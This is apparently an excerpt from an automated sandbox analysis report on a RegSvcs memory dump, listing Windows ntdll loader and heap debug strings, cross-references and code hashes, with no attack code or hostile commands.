                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                            • API String ID: 0-3223716464
                                            • Opcode ID: 76601a613e7cde53634ed72bf88f50c6417f24b5b3b8eb279ef0ca6b235e60f0
                                            • Instruction ID: ee931efdce7b7ac5ad2420b2523b192aea69bb29f66e77a40c7d2cdbeca4131f
                                            • Opcode Fuzzy Hash: 76601a613e7cde53634ed72bf88f50c6417f24b5b3b8eb279ef0ca6b235e60f0
                                            • Instruction Fuzzy Hash: 1B912571649706EFEB21DF2C8888B1E77E4AB97754F060418FA45EB242D770AF00C792
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                            • API String ID: 0-1109411897
                                            • Opcode ID: 6051ead1c4854303be9461607b9e285e0d3ec967a26276374a4135afbc115e64
                                            • Instruction ID: 3b77b655f59ee3ab4fca7237410eb2801f1d85fba1adf029ffd5f3f37fea4cf2
                                            • Opcode Fuzzy Hash: 6051ead1c4854303be9461607b9e285e0d3ec967a26276374a4135afbc115e64
                                            • Instruction Fuzzy Hash: 56A22774A0562ACBDB65CF18CCA8BA9BBB5AF45704F2442E9D909E7251DB309FC5CF00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: d756b681a7f33be34b1b3c330868ec246ef73ffd94a469916c78ba18994056ec
                                            • Instruction ID: 41c0861ccc94c573cb86d7c254de2fe22543797d83534b352b470ffc372c66b2
                                            • Opcode Fuzzy Hash: d756b681a7f33be34b1b3c330868ec246ef73ffd94a469916c78ba18994056ec
                                            • Instruction Fuzzy Hash: 38912B71B043199BEF35DF6CD885BAE7BA1BB41B24F180129E904FB681EB749B01C791
                                            Strings
                                            • Getting the shim user exports failed with status 0x%08lx, xrefs: 018B9A01
                                            • apphelp.dll, xrefs: 01856496
                                            • Loading the shim user DLL failed with status 0x%08lx, xrefs: 018B9A2A
                                            • LdrpInitShimEngine, xrefs: 018B99F4, 018B9A07, 018B9A30
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018B9A11, 018B9A3A
                                            • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 018B99ED
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: c94a6a79b5f8114c81daa61d7420ee971df3dd3228fe9a9cf8592dcef6e5a529
                                            • Instruction ID: 287c8f2f22a3f545ed81a6aeeac0980b08dac1002d9c995cf74d87a7272890d2
                                            • Opcode Fuzzy Hash: c94a6a79b5f8114c81daa61d7420ee971df3dd3228fe9a9cf8592dcef6e5a529
                                            • Instruction Fuzzy Hash: 755191716483099FE721DF28D881AAB7BE5FB84748F54051DFA85E7251EA30EB04CB93
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 018D8181, 018D81F5
                                            • minkernel\ntdll\ldrinit.c, xrefs: 0189C6C3
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 018D81E5
                                            • LdrpInitializeProcess, xrefs: 0189C6C4
                                            • Loading import redirection DLL: '%wZ', xrefs: 018D8170
                                            • LdrpInitializeImportRedirection, xrefs: 018D8177, 018D81EB
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: 95f2639297372f960550dd599a6b4338b89b8d8a2f3a8b843847763d59e60a48
                                            • Instruction ID: 4f77e2368e067d7f92b66dc055dcedb9b673340a67ae21fadabf3e49ae932ae2
                                            • Opcode Fuzzy Hash: 95f2639297372f960550dd599a6b4338b89b8d8a2f3a8b843847763d59e60a48
                                            • Instruction Fuzzy Hash: 8131F3716483069BD310EE2CDC86E1AB7D5AF95B10F05051CF944EB291EA20EF04C7E3
                                            Strings
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 018D2178
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 018D219F
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018D21BF
                                            • SXS: %s() passed the empty activation context, xrefs: 018D2165
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 018D2180
                                            • RtlGetAssemblyStorageRoot, xrefs: 018D2160, 018D219A, 018D21BA
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: 1ae2352ee5add0c1b0ca5a221150b34a23adc6c951d492b48b81d1e9dd8f9ac0
                                            • Instruction ID: f5d84654d52a1e7b741023faf3e5beddb9e73318508f0568a453047eabc59aed
                                            • Opcode Fuzzy Hash: 1ae2352ee5add0c1b0ca5a221150b34a23adc6c951d492b48b81d1e9dd8f9ac0
                                            • Instruction Fuzzy Hash: 6C31E936B4031977FF219AA98C85F5F7B6ADB95B54F098059BB04FB240D770AB00C7A1
                                            APIs
                                              • Part of subcall function 018A2DF0: LdrInitializeThunk.NTDLL ref: 018A2DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0D74
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            • Opcode ID: b4bbf9563f151a46bb699ded3a1205c3df06fe0cfab3d83c5f76857a73a001e9
                                            • Instruction ID: 6b0b78d63afdb27dd50dcafecca5c02206bcb7988fdb7cc014a6ac79de9a1f41
                                            • Opcode Fuzzy Hash: b4bbf9563f151a46bb699ded3a1205c3df06fe0cfab3d83c5f76857a73a001e9
                                            • Instruction Fuzzy Hash: 3D426D71900715DFEB21CF28C880BAAB7F5FF44314F5485A9E989EB241E770AA85CF61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: 3416ed2c4116927bee20d7794e52a9d6a718de0424d2ba363877832cc8a475e7
                                            • Instruction ID: 2b7091cde47a09a3321cf48bfd94486aa241375fbe0b3dd420a76a066bfb385f
                                            • Opcode Fuzzy Hash: 3416ed2c4116927bee20d7794e52a9d6a718de0424d2ba363877832cc8a475e7
                                            • Instruction Fuzzy Hash: FAC179741083868FD719CF58C484B6AB7E8BF84708F04496EF996EB291E734DA49CB52
                                            Strings
                                            • @, xrefs: 01898591
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0189855E
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01898421
                                            • LdrpInitializeProcess, xrefs: 01898422
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: 2d55c51f477731903bc7315a07305f947a19b06376d6561cdd02b333e686282c
                                            • Instruction ID: 65ae609c2014e646fcff24115986dd690ea3e74ddbaaf7c7b56da426e154fd28
                                            • Opcode Fuzzy Hash: 2d55c51f477731903bc7315a07305f947a19b06376d6561cdd02b333e686282c
                                            • Instruction Fuzzy Hash: 87917C7150834AAFEB21DF65CC80EABBBE8BF85744F44492EFA84D2151E734DA058B53
                                            Strings
                                            • .Local, xrefs: 018928D8
                                            • SXS: %s() passed the empty activation context, xrefs: 018D21DE
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018D22B6
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018D21D9, 018D22B1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: 0b1a59213902272b0e6c6dd49c877dc75ec5cb9f0c7bfdbf735517502824d53b
                                            • Instruction ID: 7c3209e2e370c5f1dee1a9e53c20b7a5b99b0be9b6f45cebbbe38fd0da439afd
                                            • Opcode Fuzzy Hash: 0b1a59213902272b0e6c6dd49c877dc75ec5cb9f0c7bfdbf735517502824d53b
                                            • Instruction Fuzzy Hash: 1EA17D31941229ABDF25CF68DC84BA9B7B2BF58354F1941E9E908EB251D7309F80CF91
                                            Strings
                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 018D3437
                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 018D342A
                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 018D3456
                                            • RtlDeactivateActivationContext, xrefs: 018D3425, 018D3432, 018D3451
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                            • API String ID: 0-1245972979
                                            • Opcode ID: 51e688fcc665fa2f943d3234434e3972d05bb30f8bf706709d850df25ad9ead0
                                            • Instruction ID: 9a44a6035b793eda918e7ba32bce5a2289810aa8caa68ab3cdb90b876b7bceed
                                            • Opcode Fuzzy Hash: 51e688fcc665fa2f943d3234434e3972d05bb30f8bf706709d850df25ad9ead0
                                            • Instruction Fuzzy Hash: 776127766007169FDB22CF1CC981B2AB7E5FF90B54F18851DE955DB240D738EA02CB92
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 018C106B
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 018C0FE5
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 018C1028
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018C10AE
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 875afd53b3f10578156a4619de93ad5c3ca4abe77fedd0c3de20e09cf242379a
                                            • Instruction ID: 37398d2e7dab51193477c2ef7c58a2d035e302222d6d9469be85b547cd64d1f1
                                            • Opcode Fuzzy Hash: 875afd53b3f10578156a4619de93ad5c3ca4abe77fedd0c3de20e09cf242379a
                                            • Instruction Fuzzy Hash: AD71E0B19043459FDB60DF18C889B9B7BACAF95764F500468F948CB246E334D688CBD2
                                            Strings
                                            • LdrpDynamicShimModule, xrefs: 018CA998
                                            • apphelp.dll, xrefs: 01882462
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018CA9A2
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 018CA992
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: 99932f5a79938380c917e5fa2389aac0bf33a7fde4bbb4ba55f2c9232396670b
                                            • Instruction ID: 64c51a1e8c547694cf8b3e183172d8591cb9616e2f772992d0b3194d2d0ca7e3
                                            • Opcode Fuzzy Hash: 99932f5a79938380c917e5fa2389aac0bf33a7fde4bbb4ba55f2c9232396670b
                                            • Instruction Fuzzy Hash: DB314871A00309EBDB399F6DD885AAABBB5FB80B04F15001DF910F7245E7709B81CB91
                                            Strings
                                            • HEAP[%wZ]: , xrefs: 01873255
                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0187327D
                                            • HEAP: , xrefs: 01873264
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                            • API String ID: 0-617086771
                                            • Opcode ID: 776104fdc08c48a96310a9a60ad2b523f07e4169bbbd781180c2344b6ba0f376
                                            • Instruction ID: 50ae7bb945c58f7710e6c835e65c565ec085008abbbe9dd6de76c1ab65a90a5d
                                            • Opcode Fuzzy Hash: 776104fdc08c48a96310a9a60ad2b523f07e4169bbbd781180c2344b6ba0f376
                                            • Instruction Fuzzy Hash: 1192BB71A042499FDB25CF68C440BAEBBF2FF48304F188459E899EB392D735EA41DB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: e38f0daac9e371749b83131e97aa2eb77932a8b4621359413593ab1bae211e9e
                                            • Instruction ID: fd188490260946f0a4daed8a4615810270ea78a46061a903f0a3890d619216e6
                                            • Opcode Fuzzy Hash: e38f0daac9e371749b83131e97aa2eb77932a8b4621359413593ab1bae211e9e
                                            • Instruction Fuzzy Hash: D4F18B7070060ADFEB25CF68C884B6AB7F6FB85704F148169E456DB392D734EA81CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: $@
                                            • API String ID: 2994545307-1077428164
                                            • Opcode ID: 49ae7d027245362413e5e9e7417c24200376c6049c80ec181a7f369c2e1eb5c2
                                            • Instruction ID: 7f3b5dac36b5e231d4dff25daa0d2ee96ab7043ae4ba32f9505722fa095e4ae0
                                            • Opcode Fuzzy Hash: 49ae7d027245362413e5e9e7417c24200376c6049c80ec181a7f369c2e1eb5c2
                                            • Instruction Fuzzy Hash: 04C290716083459FE725DF28C880BABBBE5BF88714F14892DF989C7241E734DA45CB52
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: fa6cb2ec7355c32bfeab7e9ca15526d826a059eb5f360784ec614c820572f097
                                            • Instruction ID: eb66fd8c933f8b176927a0b60deae46aa8dbecd24a990c91f070d89691d54acb
                                            • Opcode Fuzzy Hash: fa6cb2ec7355c32bfeab7e9ca15526d826a059eb5f360784ec614c820572f097
                                            • Instruction Fuzzy Hash: 15A147719116299BDB319B68CCC8BEAB7B8EF48700F1001EAEA09E7251D7359F85CF51
                                            Strings
                                            • Failed to allocated memory for shimmed module list, xrefs: 018CA10F
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018CA121
                                            • LdrpCheckModule, xrefs: 018CA117
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-161242083
                                            • Opcode ID: 2a8e45c9c97d1966827f2e29703cbe8616c2a821c240d88e599dde10698db3cc
                                            • Instruction ID: e3a269290a43275b8ac0e931b9e8ded7ed22e6ad5831f5ac48572400218f7616
                                            • Opcode Fuzzy Hash: 2a8e45c9c97d1966827f2e29703cbe8616c2a821c240d88e599dde10698db3cc
                                            • Instruction Fuzzy Hash: D3719D71A00309DFDB29EF6CC981AAEB7B5FB84704F14406DE902E7251E734AB85CB51
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018D82E8
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 018D82DE
                                            • Failed to reallocate the system dirs string !, xrefs: 018D82D7
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: f45a6b2167ad59f6e6a20e280519e2391756e29a351ddc5ba60ec0495f4dc5ea
                                            • Instruction ID: a6968354c9c0551332414a61cb3eeb6037d68790f00a373b3f9590ae20f644c4
                                            • Opcode Fuzzy Hash: f45a6b2167ad59f6e6a20e280519e2391756e29a351ddc5ba60ec0495f4dc5ea
                                            • Instruction Fuzzy Hash: B941E271509305ABDB21EB6CD884B5F77E8EF44764F04492AF948E7254EB70DA008BA2
                                            Strings
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0191C1C5
                                            • @, xrefs: 0191C1F1
                                            • PreferredUILanguages, xrefs: 0191C212
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            • Opcode ID: 8937a6c21c69054b3f531788a5164d9cf8266ca1a8b2748ca4ccb39133031803
                                            • Instruction ID: 219b52ed2d69a19c8afe070115fb6e34b02bc69324f6a3ca60f167215a7acebf
                                            • Opcode Fuzzy Hash: 8937a6c21c69054b3f531788a5164d9cf8266ca1a8b2748ca4ccb39133031803
                                            • Instruction Fuzzy Hash: 3841747194020DEBDF11DAD8C841FEEB7BCAB14701F04456AEA09E7244D774DA858B51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            • Opcode ID: 9aa114e8e7a152adac99a1fcf103f456dafd6c92ab5d58c1cec7e7bfa0977ada
                                            • Instruction ID: 2b5112020badd169df7854c8a2132122d0f022d4f4931d880b0d5399fa268d23
                                            • Opcode Fuzzy Hash: 9aa114e8e7a152adac99a1fcf103f456dafd6c92ab5d58c1cec7e7bfa0977ada
                                            • Instruction Fuzzy Hash: 68410431A006588BEB25DBE8C844BAEBBB8FF55344F14046EDB01EB781DB348B41CB12
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 018E4899
                                            • LdrpCheckRedirection, xrefs: 018E488F
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 018E4888
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: e4c75774998b1dd1c21f69890f612d4ca5cd462e32bd74e4fdab65251a014dd2
                                            • Instruction ID: 9d2edeed81e258843b8abe8b31b1201ea1ddbc2a8dc096abcc38e362b1edb5b1
                                            • Opcode Fuzzy Hash: e4c75774998b1dd1c21f69890f612d4ca5cd462e32bd74e4fdab65251a014dd2
                                            • Instruction Fuzzy Hash: F441B032A043659BCB21CE6DD848A267BE5AF8B750F060559ED4DE7311D731DE00CBD1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: 7ce069af0a7394bc2bf171e5ad89652a3a0c01645ecd71c43d91ec97bbec887e
                                            • Instruction ID: cfa4e748dce2e5db59cc3f988d50d48d1522091b87e0e62c1f259595ad520416
                                            • Opcode Fuzzy Hash: 7ce069af0a7394bc2bf171e5ad89652a3a0c01645ecd71c43d91ec97bbec887e
                                            • Instruction Fuzzy Hash: 4B11EE713181069FDB29CA18C480F3AF3A5EF82B1AF18816DF406CB252EB34EB41C791
                                            Strings
                                            • LdrpInitializationFailure, xrefs: 018E20FA
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018E2104
                                            • Process initialization failed with status 0x%08lx, xrefs: 018E20F3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            • Opcode ID: 3f54418a73d4ba3489ba70eedb5cb7aef3996814f39e7ba6fd9a2da122aaf783
                                            • Instruction ID: 0b26bb4ee8b311a035c434272450d81cb8177351180f3544c05baf7020192db8
                                            • Opcode Fuzzy Hash: 3f54418a73d4ba3489ba70eedb5cb7aef3996814f39e7ba6fd9a2da122aaf783
                                            • Instruction Fuzzy Hash: 61F0A43564070C6BE724D64C9C46F993BA9EB41B54F540059F600FB285D6B4A7408B91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            • Opcode ID: cc3ed2705b98fb5c794a313f2d5726e6c06b9a775d08f22f6a111d69dfc08d76
                                            • Instruction ID: e891bb7aa513c229ac11f48f27aa87c484ed365d8ff664ecaaecce38ae3cf0dc
                                            • Opcode Fuzzy Hash: cc3ed2705b98fb5c794a313f2d5726e6c06b9a775d08f22f6a111d69dfc08d76
                                            • Instruction Fuzzy Hash: 96710A71A0014A9FDB05DFA8C994BAEBBF8FF18704F154069E905E7251EB34EA41CB62
                                            Strings
                                            • LdrResSearchResource Exit, xrefs: 0186AA25
                                            • LdrResSearchResource Enter, xrefs: 0186AA13
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                            • API String ID: 0-4066393604
                                            • Opcode ID: 4ed48e7f7b93fc26a32335d3fe734f3c5966569b5450de1833b2bd0785f420b9
                                            • Instruction ID: 1908eeeaf9a558e54dd3b3f9d9271cd5b896fb96e5d32e28be80c547f0212a4b
                                            • Opcode Fuzzy Hash: 4ed48e7f7b93fc26a32335d3fe734f3c5966569b5450de1833b2bd0785f420b9
